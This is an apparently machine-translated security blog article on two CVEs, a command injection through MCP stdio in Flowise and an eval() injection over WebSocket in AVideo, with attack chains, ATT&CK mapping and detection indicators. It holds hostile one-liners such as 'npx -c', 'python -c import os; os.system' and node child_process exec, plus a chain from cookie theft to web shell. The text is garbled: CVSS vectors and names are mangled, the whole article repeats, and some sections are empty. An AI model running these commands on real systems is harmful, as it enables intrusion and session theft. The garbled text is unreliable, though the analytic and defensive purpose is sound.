Allowlist of five commands, function validateCommandInjection() and verification validateArgsForLocalFileAccess() - three layers of protection between user input and subprocess in Flowise. Payload with npx -c It's been all three. Next to the timeline - AVideo with two eval()-sink on the client side that perform arbitrary JavaScript in each user connected to WebSocket. No authentication. Without her at all.
CVE-2026-40933 (CVSS 9.9) and CVE-2026-40911 (CVSS 10.0), published in April 2026 - two different insecure installation patches that hit one point: AI and media platforms, where trust in user data is laid directly into the architecture. The same anti-patterns that five years ago killed self-written PHP scripts - eval() and subprocess.exec() without sanitary - now live in LLM-constructors with drag & drop interface.
Below is the full analysis of both vectors, reproducible steps, mapping on MITRE ATT&CK and specific compromise indicators.
CVE-2026-40933: command injection via MCP stdio to Flowise (CVSS 9.9)
Flowsee - open-source LLM-flow Builder with drag & drop interface and about 200 000 active instances with ~150 million total downloads (OX Security data, April 2026). The platform supports the Model Context Protocol to connect language models to external tools via two vehicles: HTTP/Sese for remote servers and STDIO for local processes. The entire vulnerability is concentrated in STDIO-transport. The repository on GitHub is actively supported, the patch is released in version 3.1.0.
CVE-2026-40933 - CWE-78 (OS Command Injection), vector CVSS:3.1/AV:N/AC/AC:L/L/UI:C/C/C/H:H/H:H/H:H - 9.9 (CRITICAL). Let's see: PR:L - enough any registered user; AC:L - no race condition or cunning preconditions; S:C (scope change) - Operation in the context of Flowise gives access to the host OS, compromising affects resources beyond the vulnerable component. All versions of Flowise up to 3.1.0 are affected.
The root cause is in the processing of the stdio servers by an MCP adapter configuration. When you add Custom MCP via interface http://localhost:3000/canvas the user transmits two parameters in StdioServerParameters: command (executable file) and args (Arguments). The code contains three protective mechanisms:
1. validateCommandInjection()- checking the command for typical injection-patterns
2. validateArgsForLocalFileAccess()- restriction of access to local files through arguments
3. Predefined allowlist: python, node, npm, npx, dotnet
The problem is fundamental: allowlist checks only the name of the executable file and did not want to spit on the semantics of arguments. npx The legitimate team of Node.js. But npx -c "произвольный_shell_код" - full execution of OS teams. Similarly python -c "import os; os.system('...')" and node -e "require('child_process').exec('...')". The classic failure of the blocklist approach: it is impossible to foresee all the combinations of permissible binaries with dangerous flags. Sanitization-Flowsee functions are looking for patterns like ; rm -rf / in the line of the command, but do not analyze the context of arguments -c or -e. According to the documents, there is protection. In practice, a hole.
The original code of the vulnerable paths is in the MCP-adabrate Flowise (details in the advisory GHSA-c9gw-hwqq-f33r; specify specific files and lines according to the current version of the advisory).
PoC: from Custom MCP to an arbitrary team on the host
Adjustments to the environment:
• Flowsee < 3.1.0, self-hosted instant
• Authenticized session (any level of privileges - low-priv is enough)
• Access to the Canvas web interface (/canvas)
• Docker or VM with Ubuntu 22.04+, minimum 2 GB RAM, Node.js 18+
• Flowise starts through npx flowise startor from the Docker image flowiseai/flowise
• Internet access is not required - local operation
CVE-2026-40911: eval() injection through WebSocket in AVideo (CVSS 10.0)
AVideo (WWBN) - open-source video platform. CVE-2026-40911 is fundamentally different from Flowise: CWE-94 (Improper Control of Generation of Code), CVSS vector:3.1/AV:N/AC:C/A:H/H/A:H/H/A:H/H/A:H/H:H/H 10.0 (CRITICAL). Each component at the maximum: PR:N - authentication is not needed, UI:N - the user is not required, S:C - changeability.
The versions of AVideo 29.0 and below are affected.
The vulnerability architecture is different: there is no server-side OS command injection. The server component is Amplifier - relays malicious payload to each connected client where he gets into eval(). The server is an obedient postman who delivers the bomb to all the mailboxes at once.
The YPTSocket plugin implements the WebSocket server for real-time functions (chat, notification, live streaming). The server side accepts JSON from any customer and relays it to all connected users without salitization of fields msgand callback. On the client side file plugin/YPTSocket/script.js contains two eval()-sink:
• Line 568: eval(json.msg.autoEvalCodeOnHTML)- field autoEvalCodeOnHTMLfrom inbound JSON is performed as JavaScript
• Line 95: eval(json.callback)- field callbackfrom the same JSON-message also flies to eval()
Two eval() in one file - like two open windows on the first floor. You can go through any.
Tokens for WebSocket connections are issued to anonymous visitors and do not undergo re-validation. Anyone can connect, send malicious JSON - and its payload will be performed in the browser of each active user of the platform.
Chain from anonymous connection to mass compromise
Adjustments to the environment:
• AVIdeo <= 29.0 with YPTSocket plugin on
• WebSocket port is available over the network
• Tools: wscat, browser DevTools, Python library websockets- anything with WebSocket support
• RAM and OS do not matter - the attack is performed from any client
Chain AVIDoo XSS-to-REW:
1. The attacker connects to the WebSocket-server AVideo - anonymous token is issued automatically
2. Sends JSON with payload in the field msg.autoEvalCodeOnHTMLor callback
3. The server relays the message to all connected customers without filtering
4. In each browser script.jscalls eval()on the data obtained
5. JavaScript is executed in the context of each user session - including administrators
The result: exfiltration cookies and session tokens of all connected users. The administrator is caught - the attacker receives his session and full control over the platform. The next step is to download web shell through the administrative interface of AVideo, the transition to server-side RCE. CVE-2026-40911 turns each connected user into an involuntary relay.
Mapping ATT&CK: Exploit Public-Facting Application (T1190, Initial Access) → JavaScript (T1059.007, Execution) → Expecution for Client Execution (T1203, Execution). Next: Exploitation for Privilege Escalation (T1068) through the capture of the admin session.
Where eval() injection in AVideo will not work
• Versions AVideo are newer than 29.0 - if the developers fixed the processing of WebSocket-messages
• Plugin YPTSocket Disabled - Without WebSocket Server No Delivery Vector
• CSP (Content-Security-Policy) script-src 'self'without 'unsafe-eval'- browser will block eval(). In practice, most self-hosted AVideo of CSP instances do not configure
• WAF with WebSocket Frames Inspection is a rarity, the vast majority of WAF WebSocket does not understand
• Isolated network without attacking access to WebSocket port
The principal difference from Flowise: AVideo does not require credentials at all. CVSS 10.0 - exactly about this: full availability for an anonymous attacker at maximum exposure. Flowsee - "Give me a low-priv account and I'll take the host." AVideo – “Give me network access and I’ll take the browsers of all users.”
MCP stdio as a systemic attack surface in the LLM infrastructure
CVE-2026-40933 is not an isolated case. It is part of a series of more than 14 CVE documents OX Security in the MCP-environment (The Mother of All AI Supply Chains, April 2026). One root problem - unsafe transmission of user input to subprocess through STDIO-transport - is reproduced in several platforms:
Different CWE is a single pattern: user input reaches the function of performing code without adequate validation. Pay attention to LibreChat: CWE-285 - there is a problem not in sanitization, but in authorization. MCP stdio accepts arbitrary commands without checking the rights, any authenticated user performs shell-commands as root inside the container. Three different classes of vulnerabilities, one vector - OS injection through AI-infrastructure.
The MCP protocol architecture implies that SDK for Python, TypeScript, Java and Rust transmits command and args directly in subprocess by design. Sanitation is the responsibility of the developer of the client application. The protocol itself does not impose restrictions. For the penester, this means that each MCP stdio integration is a potential entry point. You need to check not only the application, but also how it uses SDK.
Four MCP stdio operation vectors according to OX Security:
Checklist for a pentester that encounters LLM infrastructure:
Detecting: IoC and Monitoring Strategies
Compromise indicator CVE-2026-40933
• The appearance of new MCP stdio server configurations in Flowise - tracked through application audit logs
• Daughter processes from Node.js-process Flowise with arguments -c, -e, exec, bash, sh- monitoring via EDR or auditd
• Creating Files in /tmp/and atypical directories on behalf of the user, under which Flowise runs
• Outgoing TCP connections from Flowise to unknown IP (disactor reverse shell)
• HTTP POST to Canvas endpoint with JSON-body containing "transport_type": "stdio"in conjunction with suspicious values command/args
At the level of SIEM: altrate to the pattern “parent process = node/flowise, child process cmdline contains -c or -e “Collection Teams.” For auditd - rule on execve Processes in Cgroup Flowise.
Compromise indicator CVE-2026-40911
• WebSocket Messages with fields autoEvalCodeOnHTMLor callback, containing JavaScript (eval, fetch, XMLHtpRequest, document.cookie)
• Massive HTTP requests from client browsers to external domains immediately after WebSocket-communication - a sign of exfiltration
• Atypical administrative actions after WebSocket-connection: user creation, file download, configuration change
AVideo detection is more complex: payload transit, passes through WebSocket-relay, executed on the client side. Server IDS see only the fact of relaying the message, not the result eval(). The only frontier to the patch is CSP headlines:
Warning: This title with high probability will break the standard operation of AVideo - the YPTSocket plugin is architecturally dependent on eval() in legitimate scenarios. CSP here is an emergency measure before upgrading, not a production solution. To cure the disease by killing a patient is a strategy, but if the alternative is CVSS 10.0 without a patch, the choice is obvious.
On real-world projects, the scenario repeats with frightening regularity: the team deploys Flowise to “try”, after six months the country has eroded integrations with production bases and API keys to the clouds. It's a gift on the pentest.
Architectural SDK low level, subprocess - expected behavior. But the protocol, which design gives the line to shell without verification, creates a systemic stimulus for the appearance of CVE-2026-40933 clones in every product that integrates it. Scope change (S:C) in both CVSS vectors is a direct reflection of this architecture: break the app - you get a host.
Until the MCP stdio architecture changes, there will be new advisory every quarter. Only the names of the platforms in the title will change. Check your Flowe/LangFlow/LibreChat instances right now: npx -c id in the Custom MCP - if you have fulfilled, you have the same problem. On WAPT, this chain - from MCP injection to the host capture - is disassembled in the mode for the operation of server vulnerabilities.
CVE-2026-40933 (CVSS 9.9) and CVE-2026-40911 (CVSS 10.0), published in April 2026 - two different insecure installation patches that hit one point: AI and media platforms, where trust in user data is laid directly into the architecture. The same anti-patterns that five years ago killed self-written PHP scripts - eval() and subprocess.exec() without sanitary - now live in LLM-constructors with drag & drop interface.
Below is the full analysis of both vectors, reproducible steps, mapping on MITRE ATT&CK and specific compromise indicators.
CVE-2026-40933: command injection via MCP stdio to Flowise (CVSS 9.9)
Flowsee - open-source LLM-flow Builder with drag & drop interface and about 200 000 active instances with ~150 million total downloads (OX Security data, April 2026). The platform supports the Model Context Protocol to connect language models to external tools via two vehicles: HTTP/Sese for remote servers and STDIO for local processes. The entire vulnerability is concentrated in STDIO-transport. The repository on GitHub is actively supported, the patch is released in version 3.1.0.
CVE-2026-40933 - CWE-78 (OS Command Injection), vector CVSS:3.1/AV:N/AC/AC:L/L/UI:C/C/C/H:H/H:H/H:H - 9.9 (CRITICAL). Let's see: PR:L - enough any registered user; AC:L - no race condition or cunning preconditions; S:C (scope change) - Operation in the context of Flowise gives access to the host OS, compromising affects resources beyond the vulnerable component. All versions of Flowise up to 3.1.0 are affected.
The root cause is in the processing of the stdio servers by an MCP adapter configuration. When you add Custom MCP via interface http://localhost:3000/canvas the user transmits two parameters in StdioServerParameters: command (executable file) and args (Arguments). The code contains three protective mechanisms:
1. validateCommandInjection()- checking the command for typical injection-patterns
2. validateArgsForLocalFileAccess()- restriction of access to local files through arguments
3. Predefined allowlist: python, node, npm, npx, dotnet
The problem is fundamental: allowlist checks only the name of the executable file and did not want to spit on the semantics of arguments. npx The legitimate team of Node.js. But npx -c "произвольный_shell_код" - full execution of OS teams. Similarly python -c "import os; os.system('...')" and node -e "require('child_process').exec('...')". The classic failure of the blocklist approach: it is impossible to foresee all the combinations of permissible binaries with dangerous flags. Sanitization-Flowsee functions are looking for patterns like ; rm -rf / in the line of the command, but do not analyze the context of arguments -c or -e. According to the documents, there is protection. In practice, a hole.
The original code of the vulnerable paths is in the MCP-adabrate Flowise (details in the advisory GHSA-c9gw-hwqq-f33r; specify specific files and lines according to the current version of the advisory).
PoC: from Custom MCP to an arbitrary team on the host
Adjustments to the environment:
• Flowsee < 3.1.0, self-hosted instant
• Authenticized session (any level of privileges - low-priv is enough)
• Access to the Canvas web interface (/canvas)
• Docker or VM with Ubuntu 22.04+, minimum 2 GB RAM, Node.js 18+
• Flowise starts through npx flowise startor from the Docker image flowiseai/flowise
• Internet access is not required - local operation
CVE-2026-40911: eval() injection through WebSocket in AVideo (CVSS 10.0)
AVideo (WWBN) - open-source video platform. CVE-2026-40911 is fundamentally different from Flowise: CWE-94 (Improper Control of Generation of Code), CVSS vector:3.1/AV:N/AC:C/A:H/H/A:H/H/A:H/H/A:H/H:H/H 10.0 (CRITICAL). Each component at the maximum: PR:N - authentication is not needed, UI:N - the user is not required, S:C - changeability.
The versions of AVideo 29.0 and below are affected.
The vulnerability architecture is different: there is no server-side OS command injection. The server component is Amplifier - relays malicious payload to each connected client where he gets into eval(). The server is an obedient postman who delivers the bomb to all the mailboxes at once.
The YPTSocket plugin implements the WebSocket server for real-time functions (chat, notification, live streaming). The server side accepts JSON from any customer and relays it to all connected users without salitization of fields msgand callback. On the client side file plugin/YPTSocket/script.js contains two eval()-sink:
• Line 568: eval(json.msg.autoEvalCodeOnHTML)- field autoEvalCodeOnHTMLfrom inbound JSON is performed as JavaScript
• Line 95: eval(json.callback)- field callbackfrom the same JSON-message also flies to eval()
Two eval() in one file - like two open windows on the first floor. You can go through any.
Tokens for WebSocket connections are issued to anonymous visitors and do not undergo re-validation. Anyone can connect, send malicious JSON - and its payload will be performed in the browser of each active user of the platform.
Chain from anonymous connection to mass compromise
Adjustments to the environment:
• AVIdeo <= 29.0 with YPTSocket plugin on
• WebSocket port is available over the network
• Tools: wscat, browser DevTools, Python library websockets- anything with WebSocket support
• RAM and OS do not matter - the attack is performed from any client
Chain AVIDoo XSS-to-REW:
1. The attacker connects to the WebSocket-server AVideo - anonymous token is issued automatically
2. Sends JSON with payload in the field msg.autoEvalCodeOnHTMLor callback
3. The server relays the message to all connected customers without filtering
4. In each browser script.jscalls eval()on the data obtained
5. JavaScript is executed in the context of each user session - including administrators
The result: exfiltration cookies and session tokens of all connected users. The administrator is caught - the attacker receives his session and full control over the platform. The next step is to download web shell through the administrative interface of AVideo, the transition to server-side RCE. CVE-2026-40911 turns each connected user into an involuntary relay.
Mapping ATT&CK: Exploit Public-Facting Application (T1190, Initial Access) → JavaScript (T1059.007, Execution) → Expecution for Client Execution (T1203, Execution). Next: Exploitation for Privilege Escalation (T1068) through the capture of the admin session.
Where eval() injection in AVideo will not work
• Versions AVideo are newer than 29.0 - if the developers fixed the processing of WebSocket-messages
• Plugin YPTSocket Disabled - Without WebSocket Server No Delivery Vector
• CSP (Content-Security-Policy) script-src 'self'without 'unsafe-eval'- browser will block eval(). In practice, most self-hosted AVideo of CSP instances do not configure
• WAF with WebSocket Frames Inspection is a rarity, the vast majority of WAF WebSocket does not understand
• Isolated network without attacking access to WebSocket port
The principal difference from Flowise: AVideo does not require credentials at all. CVSS 10.0 - exactly about this: full availability for an anonymous attacker at maximum exposure. Flowsee - "Give me a low-priv account and I'll take the host." AVideo – “Give me network access and I’ll take the browsers of all users.”
MCP stdio as a systemic attack surface in the LLM infrastructure
CVE-2026-40933 is not an isolated case. It is part of a series of more than 14 CVE documents OX Security in the MCP-environment (The Mother of All AI Supply Chains, April 2026). One root problem - unsafe transmission of user input to subprocess through STDIO-transport - is reproduced in several platforms:
Different CWE is a single pattern: user input reaches the function of performing code without adequate validation. Pay attention to LibreChat: CWE-285 - there is a problem not in sanitization, but in authorization. MCP stdio accepts arbitrary commands without checking the rights, any authenticated user performs shell-commands as root inside the container. Three different classes of vulnerabilities, one vector - OS injection through AI-infrastructure.
The MCP protocol architecture implies that SDK for Python, TypeScript, Java and Rust transmits command and args directly in subprocess by design. Sanitation is the responsibility of the developer of the client application. The protocol itself does not impose restrictions. For the penester, this means that each MCP stdio integration is a potential entry point. You need to check not only the application, but also how it uses SDK.
Four MCP stdio operation vectors according to OX Security:
Checklist for a pentester that encounters LLM infrastructure:
Detecting: IoC and Monitoring Strategies
Compromise indicator CVE-2026-40933
• The appearance of new MCP stdio server configurations in Flowise - tracked through application audit logs
• Daughter processes from Node.js-process Flowise with arguments -c, -e, exec, bash, sh- monitoring via EDR or auditd
• Creating Files in /tmp/and atypical directories on behalf of the user, under which Flowise runs
• Outgoing TCP connections from Flowise to unknown IP (disactor reverse shell)
• HTTP POST to Canvas endpoint with JSON-body containing "transport_type": "stdio"in conjunction with suspicious values command/args
At the level of SIEM: altrate to the pattern “parent process = node/flowise, child process cmdline contains -c or -e “Collection Teams.” For auditd - rule on execve Processes in Cgroup Flowise.
Compromise indicator CVE-2026-40911
• WebSocket Messages with fields autoEvalCodeOnHTMLor callback, containing JavaScript (eval, fetch, XMLHtpRequest, document.cookie)
• Massive HTTP requests from client browsers to external domains immediately after WebSocket-communication - a sign of exfiltration
• Atypical administrative actions after WebSocket-connection: user creation, file download, configuration change
AVideo detection is more complex: payload transit, passes through WebSocket-relay, executed on the client side. Server IDS see only the fact of relaying the message, not the result eval(). The only frontier to the patch is CSP headlines:
Warning: This title with high probability will break the standard operation of AVideo - the YPTSocket plugin is architecturally dependent on eval() in legitimate scenarios. CSP here is an emergency measure before upgrading, not a production solution. To cure the disease by killing a patient is a strategy, but if the alternative is CVSS 10.0 without a patch, the choice is obvious.
On real-world projects, the scenario repeats with frightening regularity: the team deploys Flowise to “try”, after six months the country has eroded integrations with production bases and API keys to the clouds. It's a gift on the pentest.
Architectural SDK low level, subprocess - expected behavior. But the protocol, which design gives the line to shell without verification, creates a systemic stimulus for the appearance of CVE-2026-40933 clones in every product that integrates it. Scope change (S:C) in both CVSS vectors is a direct reflection of this architecture: break the app - you get a host.
Until the MCP stdio architecture changes, there will be new advisory every quarter. Only the names of the platforms in the title will change. Check your Flowe/LangFlow/LibreChat instances right now: npx -c id in the Custom MCP - if you have fulfilled, you have the same problem. On WAPT, this chain - from MCP injection to the host capture - is disassembled in the mode for the operation of server vulnerabilities.
